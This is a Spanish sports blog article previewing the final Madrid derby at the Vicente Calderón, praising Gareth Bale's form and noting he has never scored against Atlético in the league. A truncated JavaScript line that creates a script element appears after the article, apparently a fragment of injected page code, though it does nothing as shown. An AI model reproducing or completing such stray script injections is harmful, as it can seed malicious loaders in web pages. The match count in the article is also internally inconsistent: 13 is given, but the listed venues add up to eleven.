bale-gustado-cese-benitez-1451985016501

El alma blanca en los pies de Bale

Derbi Madrileño: Kelia Vidarte/LaTribunamadridista.com

Tan solo 1 día para celebrar el último derbi madrileño en el Vicente Calderón. Una noche donde durante 90 minutos veremos espectáculo futbolístico y a los mejores jugadores con el balón en sus pies. Ambos equipos llegan reforzados, pero uno de ellos destaca en el plantel del equipo madridista, un jovén galés llamado Bale.

El jugador madridista llega al derbi en el mejor momento de su carrera, de ahí que su renovación en el Real Madrid hasta el 2022 le ha hecho madurar como futbolista. Bale lleva tirando del carro de la BBC (Bale, Benzema y Cristiano) los últimos encuentros y sus números siguen creciendo (suma 7 goles igualado con Cristiano Ronaldo).

Se puede decir que la ‘Gacela de Cardiff’ este año es el alma blanca del equipo de Zidane y refleja el liderazgo de un gran jugador en cada partido. Se ha desarrollado y evolucionado su comprensión del fútbol de equipo, esto lo demostró en el último encuentro del Leganés, llevando el peso del ataque blanco, marcando los dos primeros goles, estando en todas las jugadas de peligro y buscando el balón en todo momento.

Y sus números siguen en alza, 10 partidos jugados,  siete goles a favor, 293 pases buenos, 31 balones recuperados. Ha sido reconocido por sexto año en Gales, su país natal, como mejor jugador, por su gran año en lo individual y lo colectivo, tanto en Gales como en el Real Madrid.

Es el momento sin duda para conseguir el reto de marcarle al Atlético de Madrid en Liga. Bale lleva cero goles en 13 partidos contra el equipo colchonero (Siete partidos en el Calderón y cuatro partidos en el Bernabéu). No ha sido capaz de marcar a los hombres de Simeone ni en el Calderón, ni en el Bernabéu. El único gol a los de Simeone fue en la final de la Décima consiguiendo el 2-1 en Lisboa con un certero cabezazo. Así que es una oportunidad para quitarse esa espinita y llevar a su equipo al mantenimiento del liderazgo en la clasificación de la Liga.

Bale “Todo se consigue con esfuerzo y esperanza, nadie te regala nada, si realmente quieres algo, lucha por ello”

var d=document;var s=d.createElement(‘script’);

About admin